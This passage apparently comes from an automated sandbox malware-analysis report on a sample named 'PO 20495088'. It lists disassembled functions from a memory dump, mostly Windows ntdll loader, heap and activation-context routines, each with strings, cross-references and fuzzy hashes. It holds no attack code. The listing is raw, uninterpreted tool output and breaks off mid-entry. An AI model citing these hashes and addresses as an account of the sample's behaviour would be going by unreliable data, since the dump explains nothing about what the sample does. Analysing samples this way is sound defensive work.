                                                                                                        • Opcode Fuzzy Hash: 7b205d0ab8cf3f2d5f8bfcaead2ea71f9cec4d6e367157161515a76e577005e3
                                                                                                        • Instruction Fuzzy Hash: 66510572209301DFDB21EF28C845BABF7E8FB84658F10091DFA8597165DB70EA44CB92
                                                                                                        Function 01752674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01792178
                                                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01792160, 0179219A, 017921BA
                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017921BF
                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01792180
                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 01792165
                                                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0179219F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                        • API String ID: 0-861424205
                                                                                                        • Opcode ID: 9ecceaba6c5e232276472825c3a65bf0ee1f54b14092e07381693bced36361c1
                                                                                                        • Instruction ID: a7bde55655de706103a5b837f173892afdf5502bd6b97fe86b492da32719a91f
                                                                                                        • Opcode Fuzzy Hash: 9ecceaba6c5e232276472825c3a65bf0ee1f54b14092e07381693bced36361c1
                                                                                                        • Instruction Fuzzy Hash: 8F3139B6B80315F7EB21DA999C85F5FFAB8DB65A40F050059FB0467286D3B0AE00C3A0
                                                                                                        Function 0175C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 017981E5
                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01798181, 017981F5
                                                                                                        • LdrpInitializeProcess, xrefs: 0175C6C4
                                                                                                        • LdrpInitializeImportRedirection, xrefs: 01798177, 017981EB
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0175C6C3
                                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01798170
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                        • API String ID: 0-475462383
                                                                                                        • Opcode ID: deb0c57285df5c39743b3656aaadc09519d67a47dd26328f0626edf99e3e34c2
                                                                                                        • Instruction ID: 50efeb5e8ee26ef1f24b5f1832fc7f1c6d9860322028828615439413e4f0ac64
                                                                                                        • Opcode Fuzzy Hash: deb0c57285df5c39743b3656aaadc09519d67a47dd26328f0626edf99e3e34c2
                                                                                                        • Instruction Fuzzy Hash: C531E4B26443069FD321EF28DC49E2AF7D8EF95B10F04055CF941AB299D660ED04C7A2
                                                                                                        Function 0176096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 01762DF0: LdrInitializeThunk.NTDLL ref: 01762DFA
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BA3
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BB6
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D60
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D74
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 1404860816-0
                                                                                                        • Opcode ID: 83f1c30214d5ae07c48dcebb8d15807debf62bf1f1e8dca116419813b44b7b2f
                                                                                                        • Instruction ID: 298e506122e2ef465eef6cce5443ef1fa643323b92a149b412061e71f0bca7f6
                                                                                                        • Opcode Fuzzy Hash: 83f1c30214d5ae07c48dcebb8d15807debf62bf1f1e8dca116419813b44b7b2f
                                                                                                        • Instruction Fuzzy Hash: 6B425D71900715DFDB61CF28C884BAAB7F9FF48314F1445AAE989DB245E770AA84CF60
                                                                                                        Function 0172A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                        • API String ID: 0-379654539
                                                                                                        • Opcode ID: 548e7bfd93300458b1a1686b66c0c13907bbdd383b79834c16e9a1ebfa9a1550
                                                                                                        • Instruction ID: e1442fb5502c17571284663e9498bc16824eb895af2569cec115048c909ad4cc
                                                                                                        • Opcode Fuzzy Hash: 548e7bfd93300458b1a1686b66c0c13907bbdd383b79834c16e9a1ebfa9a1550
                                                                                                        • Instruction Fuzzy Hash: F7C1BA70108392CFD721DF59C144B6AFBE4FF94304F0489AAF9968BA51E334CA4ACB52
                                                                                                        Function 01758402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • LdrpInitializeProcess, xrefs: 01758422
                                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0175855E
                                                                                                        • @, xrefs: 01758591
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01758421
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-1918872054
                                                                                                        • Opcode ID: f626bbc94354c7186721b8d20a6d1870810694c7467ba69f399b8d16718b4cc9
                                                                                                        • Instruction ID: 7253cf5f8024ebf96f597e524b6814d57b616e56a7f8f0c414ea0cbde554013c
                                                                                                        • Opcode Fuzzy Hash: f626bbc94354c7186721b8d20a6d1870810694c7467ba69f399b8d16718b4cc9
                                                                                                        • Instruction Fuzzy Hash: D6919B71548345AFDB62DF26CC44FABFAECFB84684F40092EFA8896155E770D9048B63
                                                                                                        Function 0175273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • .Local, xrefs: 017528D8
                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 017921DE
                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017922B6
                                                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017921D9, 017922B1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                        • API String ID: 0-1239276146
                                                                                                        • Opcode ID: 5664e47b0dcf912ab1412f4f4c21ce202c0ff37e43499069d552ae061a06fc43
                                                                                                        • Instruction ID: fd250eb193926f936f7e31ca75b53a53e3bbd56c612242a5179b674cff0fc357
                                                                                                        • Opcode Fuzzy Hash: 5664e47b0dcf912ab1412f4f4c21ce202c0ff37e43499069d552ae061a06fc43
                                                                                                        • Instruction Fuzzy Hash: A2A1BE31944229DBDB65DF68D888BA9F7B0BF58314F2501E9DD08AB352D7709E84CF90
                                                                                                        Function 01754AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0179342A
                                                                                                        • RtlDeactivateActivationContext, xrefs: 01793425, 01793432, 01793451
                                                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01793437
                                                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01793456
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                        • API String ID: 0-1245972979
                                                                                                        • Opcode ID: 3c8e57c145ff1849f13a3891823b9cae461e41030f169a02d235a86d6a5e0989
                                                                                                        • Instruction ID: 07f265c53810513e4e3b694b74ac580ef6125ed54c84b33e5daad3f8c8d1ff76
                                                                                                        • Opcode Fuzzy Hash: 3c8e57c145ff1849f13a3891823b9cae461e41030f169a02d235a86d6a5e0989
                                                                                                        • Instruction Fuzzy Hash: D0613476604B129BDB22CF2CC885B3AF7E1BF80B50F158559EC569B291E770EC41CB91
                                                                                                        Function 017264AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01781028
                                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01780FE5
                                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017810AE
                                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0178106B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                        • API String ID: 0-1468400865
                                                                                                        • Opcode ID: 526fa3efb6e44a0765825f4fb5f37c448d6c7b5e90e1a8ed0673de6e97b40941
                                                                                                        • Instruction ID: bcbe1a320d2ebd5edc350c5e78a5339bc746e8df7e7a3d2501e45a3a26cd2abc
                                                                                                        • Opcode Fuzzy Hash: 526fa3efb6e44a0765825f4fb5f37c448d6c7b5e90e1a8ed0673de6e97b40941
                                                                                                        • Instruction Fuzzy Hash: 7A71E3B19043159FCB21EF19C888B9BBFA8EF94764F500469FD488B14AD334D589CBD2
                                                                                                        Function 0174245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • LdrpDynamicShimModule, xrefs: 0178A998
                                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0178A992
                                                                                                        • apphelp.dll, xrefs: 01742462
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0178A9A2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-176724104
                                                                                                        • Opcode ID: af68c29aedbf4c66b0b088be0dfeaef9ddafbabf06e4d26b17a7971867058cc1
                                                                                                        • Instruction ID: 5b1b71c2057f22ad524ea62e24e14d29c56bae0c563780150a9632fe815c2e8b
                                                                                                        • Opcode Fuzzy Hash: af68c29aedbf4c66b0b088be0dfeaef9ddafbabf06e4d26b17a7971867058cc1
                                                                                                        • Instruction Fuzzy Hash: 3F312A77640202ABDB31AF5DD885E6AFBB8FB84714F26005AFD01A7249D7B05A41CB40
                                                                                                        Function 017329A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • HEAP[%wZ]: , xrefs: 01733255
                                                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0173327D
                                                                                                        • HEAP: , xrefs: 01733264
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                        • API String ID: 0-617086771
                                                                                                        • Opcode ID: 061dad94a5e6df17c526cb95543c0b923feeab6042300fe9f22b0fe3abeed9c8
                                                                                                        • Instruction ID: 6d9ef0ee985e5aafab084fec2d092322e071d686ca71c999b661f3be137bc984
                                                                                                        • Opcode Fuzzy Hash: 061dad94a5e6df17c526cb95543c0b923feeab6042300fe9f22b0fe3abeed9c8
                                                                                                        • Instruction Fuzzy Hash: 63929A71A046499FEB25CF68C444BAEFBF1FF88300F188099E959AB392D735A945CF50
                                                                                                        Function 01730770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-4253913091
                                                                                                        • Opcode ID: 62b4da434b645814e0e45186ba4ba17f8dca39d1775f0804cb837393180d3e20
                                                                                                        • Instruction ID: 29321822eee6bba1b9de94d38d6221337ff291e1e0c6ee4fc84571cbb21b5b03
                                                                                                        • Opcode Fuzzy Hash: 62b4da434b645814e0e45186ba4ba17f8dca39d1775f0804cb837393180d3e20
                                                                                                        • Instruction Fuzzy Hash: ABF1BE70A40606DFEB25DF68C894B6AF7F5FF84304F1481A8E5169B386D734EA81CB90
                                                                                                        Function 01746962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $@
                                                                                                        • API String ID: 0-1077428164
                                                                                                        • Opcode ID: dcb329dc1fb1b03771abfadf3c46bfbb24f0c9a5df5cad27fb6d66352f472771
                                                                                                        • Instruction ID: 7758d3631844b52ac7abe1bbad1c800a5075a946ea4543a1b62b50a0e955725a
                                                                                                        • Opcode Fuzzy Hash: dcb329dc1fb1b03771abfadf3c46bfbb24f0c9a5df5cad27fb6d66352f472771
                                                                                                        • Instruction Fuzzy Hash: FAC27F716083419FE72ACF28C881BABFBE5AF89754F04896DF999C7241D734D844CB62
                                                                                                        Function 0171A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                                        • API String ID: 0-2779062949
                                                                                                        • Opcode ID: 18195bd714d1e777f06cde65608d3d29073deef7e9fec82329e3ee7ca454cbb2
                                                                                                        • Instruction ID: dc928f80127ced58e0ef87ff949d10475f54df84fb6e50b54ea6b6f822f14ad6
                                                                                                        • Opcode Fuzzy Hash: 18195bd714d1e777f06cde65608d3d29073deef7e9fec82329e3ee7ca454cbb2
                                                                                                        • Instruction Fuzzy Hash: 28A13E7191162A9BDF329F68CC88BE9F7B8EF48710F1041EAD909A7251D7359E84CF50
                                                                                                        Function 01740BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0178A121
                                                                                                        • Failed to allocated memory for shimmed module list, xrefs: 0178A10F
                                                                                                        • LdrpCheckModule, xrefs: 0178A117
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-161242083
                                                                                                        • Opcode ID: 6452f3f4cf98fc84dd1cc9ff705893313fc26eea79fcf157210cd7d3cf937e31
                                                                                                        • Instruction ID: 6b33cafa93b402765dddbb133e043f63865cef688884d5d85d4d4edb2d82b718
                                                                                                        • Opcode Fuzzy Hash: 6452f3f4cf98fc84dd1cc9ff705893313fc26eea79fcf157210cd7d3cf937e31
                                                                                                        • Instruction Fuzzy Hash: EB71DE71A00206DFDB25EF68C984AFEF7F8FB84204F14406DE942EB255E774AA42CB54
                                                                                                        Function 01730A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-1334570610
                                                                                                        • Opcode ID: be414006958ce051c306843d2d8c435ac6df46970c6e9b48cebc46c540d9592f
                                                                                                        • Instruction ID: 2d8cb52d0606861c33f70375b2176dade747ac617b6950b02afe8fd05d503d43
                                                                                                        • Opcode Fuzzy Hash: be414006958ce051c306843d2d8c435ac6df46970c6e9b48cebc46c540d9592f
                                                                                                        • Instruction Fuzzy Hash: E761CE70600301DFDB29DF28C844B6AFBE1FF85308F148599E4498F296D770E981CB91
                                                                                                        Function 0175C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • Failed to reallocate the system dirs string !, xrefs: 017982D7
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017982E8
                                                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 017982DE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-1783798831
                                                                                                        • Opcode ID: 269372401ed8d4db53268a4c3476bd900d2167a89f271692cc105e4977fbde1c
                                                                                                        • Instruction ID: 69bde59306c79a7395239508ad7fd6823f835fa1ea3607fcc5cc1d038a67e0e1
                                                                                                        • Opcode Fuzzy Hash: 269372401ed8d4db53268a4c3476bd900d2167a89f271692cc105e4977fbde1c
                                                                                                        • Instruction Fuzzy Hash: 4E41F372544305ABD722EB68DC48B5BF7ECEF48A50F10492AF955D3299E7B0D900CB91
                                                                                                        Function 017DC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • @, xrefs: 017DC1F1
                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017DC1C5
                                                                                                        • PreferredUILanguages, xrefs: 017DC212
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                        • API String ID: 0-2968386058
                                                                                                        • Opcode ID: 4b814b5e3e37f7bcf8e4c098e9275b7e9808212f70324ff0982c34a2e18d5c85
                                                                                                        • Instruction ID: 2744613aea18f2d4fcb337b72f6fa15084ce138cda665eac1e1fdaa9dd50c5f5
                                                                                                        • Opcode Fuzzy Hash: 4b814b5e3e37f7bcf8e4c098e9275b7e9808212f70324ff0982c34a2e18d5c85
                                                                                                        • Instruction Fuzzy Hash: 23416371E0420DEBDB12DAD8C895FEEFBBDAB18700F14416EEA09B7244D774AA44CB50
                                                                                                        Function 017B4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                        • API String ID: 0-1373925480
                                                                                                        • Opcode ID: 515579f8ab8152fa82f5f1732b57a79be4200f95fc45834dee2c64bdd5f09a34
                                                                                                        • Instruction ID: f8fa6b3dccd98f52f59df9a17c2f3ca44820691accc96306994187fa7b2ed058
                                                                                                        • Opcode Fuzzy Hash: 515579f8ab8152fa82f5f1732b57a79be4200f95fc45834dee2c64bdd5f09a34
                                                                                                        • Instruction Fuzzy Hash: 2A41F431A04658CBEB26DB99C888BEDFBB8FF95340F140469D903EB796D7349941CB50
                                                                                                        Function 017A4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • LdrpCheckRedirection, xrefs: 017A488F
                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 017A4899
                                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017A4888
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                        • API String ID: 0-3154609507
                                                                                                        • Opcode ID: b46b5da07d54777afab50feeec9354a20c09631ec7043561f3f0a17507323c3e
                                                                                                        • Instruction ID: 09272011ce66559ef06b665e42738e439b865f3bc093614727b83b3845bac2c1
                                                                                                        • Opcode Fuzzy Hash: b46b5da07d54777afab50feeec9354a20c09631ec7043561f3f0a17507323c3e
                                                                                                        • Instruction Fuzzy Hash: 5241D332A442919FCB21CE1CE840A26FBE4EFC9A50F49076DED4AD7215D7B2D800CB81
                                                                                                        Function 01730BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                        • API String ID: 0-2558761708
                                                                                                        • Opcode ID: 87542aeba5acd1e7d055acadcfbb066c3239633e015d3f1c0fd13a17bf9898b3
                                                                                                        • Instruction ID: 675aeddb6bd654cf8152107888ce909b9f089d7b66c6cefb89aa40b4b5abe9e9
                                                                                                        • Opcode Fuzzy Hash: 87542aeba5acd1e7d055acadcfbb066c3239633e015d3f1c0fd13a17bf9898b3
                                                                                                        • Instruction Fuzzy Hash: 3911AC32395142DFDB29EA1CC859B6AF3A5EF80616F1881A9F40ACB65ADB30D841CB50
                                                                                                        Function 017A20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 017A20F3
                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017A2104
                                                                                                        • LdrpInitializationFailure, xrefs: 017A20FA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-2986994758
                                                                                                        • Opcode ID: 36f83d614d1e48cce970d1b8153e00c22428edc27ec49dbff6a4bc9c7bbd808a
                                                                                                        • Instruction ID: aba1b627513cf19e9f75397be503d447c436f93d16b0204a25c0910851822c3b
                                                                                                        • Opcode Fuzzy Hash: 36f83d614d1e48cce970d1b8153e00c22428edc27ec49dbff6a4bc9c7bbd808a
